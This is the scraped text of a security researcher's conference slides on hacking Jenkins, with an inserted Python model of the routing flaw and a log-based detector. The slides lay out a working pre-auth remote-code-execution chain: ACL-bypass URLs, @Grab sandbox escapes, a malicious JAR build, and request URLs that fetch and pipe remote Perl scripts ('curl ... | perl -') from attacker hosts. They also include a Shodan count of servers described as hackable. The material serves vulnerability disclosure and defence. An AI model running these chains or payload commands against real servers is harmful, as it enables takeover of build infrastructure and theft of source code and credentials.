Hacking Jenkins!
Orange Tsai

• Comes from Taiwan
• Principal security researcher at DEVCORE
• Speaker at Black Hat US/ASIA, DEFCON, HITB, CODEBLUE…
• CTF player (Captain of HITCON CTF team and member of 217)
• Bounty hunter (Found RCE on Facebook, GitHub, Twitter, Uber…)
Orange Tsai
orange_8361

Outline
• Introduction & architecture
• The vulnerability root cause & how to exploit
1. ACL bypass vulnerability
2. Sandbox escape vulnerability
• Evolution of the exploit

What is Jenkins
A famous CI/CD service

What is CI/CD
Continuous Integration and Continuous Delivery

Why Jenkins
Hacker-friendly

JVM ecosystem report 2018
https://snyk.io/blog/jvm-ecosystem-report-2018/

Jenkins for hackers
• Lots of
  • source code
  • credential / GitHub token
  • computer node (Intranet!!!)

Common attack vectors
• Login portal
• Known vulnerabilities

Past deserialization bugs on Jenkins
• CVE-2015-8103 - The first deserialization bug
• CVE-2016-0788 - Bypass the blacklist by the JRMP gadget
• CVE-2016-0792 - Bypass the blacklist by the XStream
• CVE-2016-9299 - Bypass the blacklist by the LDAP gadget
• CVE-2017-1000353 - Bypass the blacklist by the SignedObject…

Jenkins remoting 2.54
CVE-2015-8103

Jenkins remoting 2.55
CVE-2016-0788

Jenkins remoting 3.2
CVE-2016-9299

Jenkins remoting 3.28
CVE-2017-1000353

Jenkins was so angry that it rewrote the entire serialization protocol into a new HTTP-based protocol

No deserialization anymore
There has been no more pre-auth RCE in Jenkins core since 2017

Discover a new one

Reviewing scopes
1. Jenkins core
2. Stapler framework
3. Default plugins

CVEs
1. CVE-2018-1000600 - CSRF and missing permission checks in GitHub Plugin
2. CVE-2018-1000861 - Code execution through crafted URLs
3. CVE-2018-1999002 - Arbitrary file read vulnerability
4. CVE-2018-1999046 - Unauthorized users could access agent logs
5. CVE-2019-1003000 - Sandbox Bypass in Script Security and Pipeline Plugins
6. CVE-2019-1003001 - Sandbox Bypass in Script Security and Pipeline Plugins
7. CVE-2019-1003002 - Sandbox Bypass in Script Security and Pipeline Plugins

Review Java web
• Where is the configuration?
• Where is the library?
• Where is the application code?
• Where is the entry point?

ROOT/
├── index.jsp
├── robots.txt
└── WEB-INF
    ├── classes
    │   └── HelloWorld.class
    ├── lib
    │   └── servlet-api.jar
    └── web.xml

<servlet>
  <servlet-name>Stapler</servlet-name>
  <servlet-class>org.kohsuke.stapler.Stapler</servlet-class>
</servlet>
…
<servlet-mapping>
  <servlet-name>Stapler</servlet-name>
  <url-pattern>/*</url-pattern>
</servlet-mapping>

Jenkins/war/src/main/webapp/WEB-INF/web.xml

Jenkins dynamic routing

Routing rules
<token>
get<token>()
get<token>(String)
get<token>(Int)
get<token>(Long)
get<token>(StaplerRequest)
getDynamic(String, …)
doDynamic(…)
do<token>(…)
js<token>(…)
@WebMethod annotation
@JavaScriptMethod annotation

Method Chain
jenkins.model.Jenkins.getFoo()
                     .getBar(1)
                     .getBaz("orange")
http://jenkins/foo/bar/1/baz/orange

CVE-2018-1000861
Code execution through crafted URLs
Routing Access Control List Bypass
Bypass Overall/Read permission

What's wrong with that?
Here are two problems

First problem
Every class in Java inherits from the Object class, except Object itself

jenkins.model.Jenkins.getClass()
                     .getClassLoader()
                     .getResource("index.jsp")
                     .getContent()
http://jenkins/class/classLoader/resource/index.jsp/content

jenkins.model.Jenkins
    .getClass()
    .getClassLoader()
    .getResource("index.jsp")
    .getContent()

1. get<token>()
2. get<token>(String)
3. get<token>(Int)
4. get<token>(Long)
5. get<token>(StaplerRequest)
6. getDynamic(String, …)
7. doDynamic(…)
8. do<token>(…)
9. ……

public final Class<?> getClass()        java.lang.Object
public ClassLoader getClassLoader()     java.lang.Class
public URL getResource(String name)     java.lang.ClassLoader
public final Object getContent()        java.net.URL

Second problem
URL prefix whitelist bypass

URL whitelists by default
jenkins.model.Jenkins.doLogout(…)
http://jenkins/logout

jenkins.model.Jenkins
    .getSearch()
http://jenkins/search?q=
403 Forbidden

What if there is a whitelisted method that returns a Search object?

http://jenkins/securityRealm/
public SecurityRealm getSecurityRealm()
Jenkins.model.Jenkins
jenkins.model.Jenkins
    .getSecurityRealm()

http://jenkins/securityRealm/user/[name]/
public User getUser(String id)
Jenkins.model.HudsonPrivateSecurityRealm
jenkins.model.Jenkins
    .getSecurityRealm()
    .getUser([name])

http://jenkins/securityRealm/user/[name]/search
public Search getSearch()
Jenkins.model.AbstractModelObject
jenkins.model.Jenkins
    .getSecurityRealm()
    .getUser([name])
    .getSearch()

Jenkins checks the permission again before most of the dangerous methods
It's sad
http://jenkins/script
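
The routing rules and the two problems above, as an added Python model (not Stapler or Jenkins code): `walk` turns URL tokens into getter calls, `naive_dispatch` decides permission from the URL prefix alone, and `hardened_dispatch` shows one possible hardening that refuses getters inherited from the base object and checks the target's permission on every hop. The `*Model` classes, the `requires_read` flag and the hardening itself are assumptions made for illustration.

```python
import inspect

class JavaObject:
    """Stand-in for java.lang.Object: every class below inherits getClass()."""
    requires_read = False              # True = object needs Overall/Read

    def getClass(self):
        return ClassModel(type(self).__name__)

class ClassModel(JavaObject):          # models java.lang.Class
    def __init__(self, name):
        self.name = name

    def getClassLoader(self):
        return LoaderModel()

class LoaderModel(JavaObject):         # models java.lang.ClassLoader
    def getResource(self, name):
        return UrlModel(name)

class UrlModel(JavaObject):            # models java.net.URL
    def __init__(self, name):
        self.name = name

    def getContent(self):
        return f"<contents of {self.name}>"

class Search(JavaObject):
    requires_read = True

class User(JavaObject):
    def __init__(self, user_id):
        self.user_id = user_id

    def getSearch(self):
        return Search()

class SecurityRealm(JavaObject):
    def getUser(self, user_id):
        return User(user_id)

class Jenkins(JavaObject):
    def getSecurityRealm(self):
        return SecurityRealm()

    def getSearch(self):
        return Search()

ANON_PREFIXES = ("/securityRealm",)    # one whitelisted prefix from the slides

def walk(root, path, authenticated=False, hardened=False):
    """Map /a/b/x onto root.getA().getB("x"); return (object, call chain)."""
    node, chain = root, []
    tokens = [t for t in path.split("?")[0].split("/") if t]
    while tokens:
        token = tokens.pop(0)
        name = "get" + token[0].upper() + token[1:]
        method = getattr(node, name, None)
        if not callable(method):
            raise LookupError(f"404: {type(node).__name__} has no {name}")
        if hardened:
            # Only dispatch to getters the application itself declares.
            owner = next(c for c in type(node).__mro__ if name in vars(c))
            if owner is JavaObject:
                raise LookupError(f"404: {name} is not routable")
        if inspect.signature(method).parameters:     # get<token>(String)
            if not tokens:
                raise LookupError(f"404: {name} needs an argument")
            node = method(tokens.pop(0))
        else:                                        # get<token>()
            node = method()
        if hardened and getattr(node, "requires_read", False) and not authenticated:
            raise PermissionError("403 Forbidden")   # checked on every hop
        chain.append(f"{name}() -> {type(node).__name__}")
    return node, chain

def naive_dispatch(path, authenticated=False):
    """Vulnerable design: permission decided once, from the URL prefix."""
    if not authenticated and not path.startswith(ANON_PREFIXES):
        raise PermissionError("403 Forbidden")
    return walk(Jenkins(), path)

def hardened_dispatch(path, authenticated=False):
    """Every hop is vetted: getter ownership first, then the target's ACL."""
    return walk(Jenkins(), path, authenticated, hardened=True)

if __name__ == "__main__":
    for p in ("/search", "/securityRealm/user/alice/search"):
        for fn in (naive_dispatch, hardened_dispatch):
            try:
                print(fn.__name__, p, "->", fn(p)[1])
            except (PermissionError, LookupError) as exc:
                print(fn.__name__, p, "->", exc)
```
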

Maximize the severity
Escalate to a pre-auth information leakage √
Escalate to a pre-auth Server Side Request Forgery √
Escalate to a pre-auth Remote Code Execution ?

Remote Code Execution
• CVE-2018-1000861 - Code execution through crafted URLs
• CVE-2019-1003000 - Sandbox Bypass in Script Security Plugins

What is Pipeline
Pipeline is a script that makes it easier for developers to write scripts for software building, testing and delivering!

Pipeline is a DSL
Which is built with Groovy

Pipeline syntax check
http://jenkins/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=[Pipeline here]

If you are the programmer
How do you implement this syntax-error-checking function?

As I said before
Pipeline is a DSL built with Groovy

No execute(), only AST parse

Nothing happened :(
this.class.classLoader.parseClass('''
java.lang.Runtime.getRuntime().exec("touch pwned")
''');

I failed to exploit before
But this time, Meta-Programming flashed in my mind

Meta-Programming is
Write programs that operate on other programs
• Compiler
• Preprocessor
• Interpreter
• Linker
• …

Two types
• Compile-time
• Run-time

compile-time Meta-Programming
• Operate the program during compiler/parsing time
• C Macro
• C++ Template
• Java Annotation
• DSL
• …

$ gcc test.c -c && ls --size -h test.o
2GB test.o

Fibonacci number

Groovy Meta-Programming
Pipeline is a DSL built with Groovy

Reading…

@ASTTest
What the hell is that

@ASTTest is a special AST transformation meant to help debugging other AST transformations or the Groovy compiler itself. It will let the developer “explore” the AST during compilation and perform assertions on the AST rather than on the result of compilation. This means that this AST transformations gives access to the AST before the bytecode is produced. @ASTTest can be placed on any annotable node and requires two parameters:

@ASTTest(phase=CONVERSION, value={
    assert node instanceof ClassNode
    assert node.name == 'Person'
})
class Person {}

Let's try that locally
this.class.classLoader.parseClass('''
@groovy.transform.ASTTest(value={
    assert java.lang.Runtime.getRuntime().exec("touch pwned")
})
class Person {}
''');

$ ls
poc.groovy
$ groovy poc.groovy
$ ls
poc.groovy pwned

While reproducing it on remote…
It shows
What the hell is that
Root cause analysis
• Pipeline Shared Groovy Libraries Plugin
• A plugin for importing customized libraries into Pipeline
• Jenkins loads your customized library before every Pipeline execute
• The root cause is - during compile-time, there is no
corresponded library in classPath
![Page 76: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/76.jpg)
How to fixAsk admin to uninstall the plugin
![Page 77: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/77.jpg)
How to fixAsk admin to uninstall the plugin
![Page 78: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/78.jpg)
@Grab@Grab(group='commons-lang', module='commons-lang', version='2.4')
import org.apache.commons.lang.WordUtils
println "Hello ${WordUtils.capitalize('world')}"
![Page 79: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/79.jpg)
@GrabResolver
@GrabResolver(name='restlet', root='http://maven.restlet.org/')
@Grab(group='org.restlet', module='org.restlet', version='1.1.6')
import org.restlet
![Page 80: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/80.jpg)
@GrabResolver
@GrabResolver(name='restlet', root='http://malicious.com/')
@Grab(group='org.restlet', module='org.restlet', version='1.1.6')
import org.restlet
![Page 81: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/81.jpg)
Oh, it works
220.133.114.83 - - [18/Dec/2018:18:56:54 +0800] "HEAD /org/restlet/org.restlet/1.1.6/org.restlet-1.1.6.jar HTTP/1.1" 404 185 "-" "Apache Ivy/2.4.0"
![Page 82: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/82.jpg)
Import arbitrary JAR
But how to get code execution?
![Page 83: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/83.jpg)
Dig deeper into @Grab
We start to review the Groovy implementation
![Page 84: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/84.jpg)
groovy.grape.GrapeIvy
![Page 86: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/86.jpg)
Yes
We can poke the Constructor on any class!
![Page 87: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/87.jpg)
Chain all together
![Page 88: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/88.jpg)
Prepare the malicious JAR
public class Orange {
    public Orange() {
        try {
            String payload = "curl malicious/bc.pl | perl -";
            String[] cmds = {"/bin/bash", "-c", payload};
            java.lang.Runtime.getRuntime().exec(cmds);
        } catch (Exception e) { }
    }
}
![Page 89: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/89.jpg)
Prepare the malicious JAR
$ javac Orange.java
$ mkdir -p META-INF/services/
$ echo Orange >META-INF/services/org.codehaus.groovy.plugins.Runners
$ find -type f
./Orange.java
./Orange.class
./META-INF/services/org.codehaus.groovy.plugins.Runners
$ jar cvf poc-1.jar tw/
$ cp poc-1.jar ~/www/tw/orange/poc/1/
$ curl -I http://[host]/tw/orange/poc/1/poc-1.jar
![Page 90: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/90.jpg)
Attacking remote Jenkins!
http://jenkins/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='orange.tw', root='http://evil/')%0a
@Grab(group='tw.orange', module='poc', version='1')%0a
import Orange;
![Page 91: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/91.jpg)
Demo
https://youtu.be/abuH-j-6-s0
![Page 92: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/92.jpg)
Survey on Shodan
• There are about 75000 Jenkins servers in the wild
• $ cat versions | sort | uniq -c | sort -n | less
• 11750 - Jenkins: 2.150.1
• 5473 - Jenkins: 2.138.3
• 4583 - Jenkins: 2.121.3
• 4534 - Jenkins: 2.138.2
• 3389 - Jenkins: 2.156
• 2987 - Jenkins: 2.138.1
• 2530 - Jenkins: 2.121.1
• 2422 - Jenkins: 2.121.2
• 1933 - Jenkins: 2.107.3
• 1577 - Jenkins: 2.60.3
• 1559 - Jenkins: 2.107.2
• 1348 - Jenkins: 2.89.4
• 1263 - Jenkins: 2.155
• 1095 - Jenkins: 2.153
• 1012 - Jenkins: 2.107.1
• 958 - Jenkins: 2.89.3
![Page 93: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/93.jpg)
Survey on Shodan
• We assume all of them installed the suggested plugins
• Servers with Overall/Read enabled are vulnerable
• Servers with Overall/Read disabled
• Version > 2.138 can be chained with the ACL bypass vulnerability
• That is about 45000/75000 vulnerable Jenkins servers we can hack
![Page 94: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/94.jpg)
Evolution of the exploit
• 2018-12-05 - CVE-2018-1000861: ACL bypass fixed (@orange_8361)
• 2019-01-08 - CVE-2019-1003000: Sandbox escape fixed (classLoader.parseClass) (@orange_8361)
• 2019-01-16 - Release the blog Hacking Jenkins part-1 (@orange_8361)
• 2019-01-28 - CVE-2019-1003005: Another path to reach the syntax validation fixed (GroovyShell.parse) (@0ang3el)
• 2019-02-19 - Release the blog Hacking Jenkins part-2 and the RCE chain (@orange_8361)
• 2019-03-06 - CVE-2019-1003029: Another sandbox escape in GroovyShell.parse fixed (@webpentest)
![Page 95: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/95.jpg)
Evolution of the exploit
• Original entry (based on classLoader.parseClass)
• Meta programming is still required to obtain code execution
• New entry found by @0ang3el (based on GroovyShell.parse)
• A more universal entry
• The new entry is based on a higher-level Groovy API
• With more features added compared to the original API, @webpentest found an easier way to escape the sandbox!
![Page 96: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/96.jpg)
More reliable exploit chain
http://jenkins/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript
?sandbox=true
&value=public class poc {
    public poc() { "curl orange.tw/bc.pl | perl -".execute() }
}
CVE-2019-1003029 by @webpentest
CVE-2019-1003005 by @0ang3el
CVE-2018-1000861 by @orange_8361
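A defender-side check for the two request shapes on the "Attacking remote Jenkins!" and "More reliable exploit chain" slides, added here as an example and not taken from the talk: it tags access-log lines that reach the script-validation endpoints and carry Grape annotations or a class declaration in `value`. The combined log format with query strings recorded, the tag names, and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Both endpoints appear on the slides; each compiles a caller-supplied Groovy script.
ENDPOINTS = ("/checkScriptCompile", "/checkScript")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Tag names are hypothetical; patterns mirror the script contents shown on the slides.
SCRIPT_MARKERS = {
    "grape-annotation": re.compile(r"@Grab\w*"),
    "remote-resolver": re.compile(r"@GrabResolver\s*\([^)]*root\s*=\s*['\"]https?://", re.S),
    "checksums-disabled": re.compile(r"disableChecksums\s*=\s*true"),
    "class-declaration": re.compile(r"\bclass\s+\w+\s*\{"),
}

def classify(line):
    """Return the sorted tags raised by one access-log line ([] if none)."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if "/descriptorByName/" not in url.path or not url.path.endswith(ENDPOINTS):
        return []
    tags = {"script-validation-endpoint"}
    if "/securityRealm/user/" in url.path:
        tags.add("routed-via-securityRealm")  # path shape used with the ACL bypass
    script = "\n".join(parse_qs(url.query).get("value", []))  # percent-decoded
    tags.update(name for name, rx in SCRIPT_MARKERS.items() if rx.search(script))
    return sorted(tags)

# Constructed sample lines: addresses, hosts and timestamps are made up.
BASE = "/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition"
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Mar/2019:10:00:00 +0000] "GET /job/app/3/console HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Mar/2019:10:00:05 +0000] "GET ' + BASE +
    '/checkScriptCompile?value=node%20%7B%20echo%20%27hi%27%20%7D HTTP/1.1" 200 40',
    '203.0.113.9 - - [01/Mar/2019:10:01:00 +0000] "GET ' + BASE +
    '/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a'
    '@GrabResolver(name=%27x%27,root=%27http://repo.example/%27)%0a'
    '@Grab(group=%27g%27,module=%27m%27,version=%271%27)%0aimport%20X HTTP/1.1" 200 40',
    '203.0.113.9 - - [01/Mar/2019:10:02:00 +0000] "GET /securityRealm/user/admin'
    '/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript'
    '/checkScript?sandbox=true&value=public%20class%20poc%20%7B%20public%20poc()'
    '%20%7B%20%7D%20%7D HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(classify(entry) or "ok", "<-", entry[:70])
```

Requests sent as POST keep `value` in the body, so the script markers only fire where the proxy or WAF also records bodies; the endpoint and routing tags still apply.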
![Page 97: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/97.jpg)
awesome-jenkins-rce-2019
![Page 102: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/102.jpg)
Upgrade your Jenkins ASAP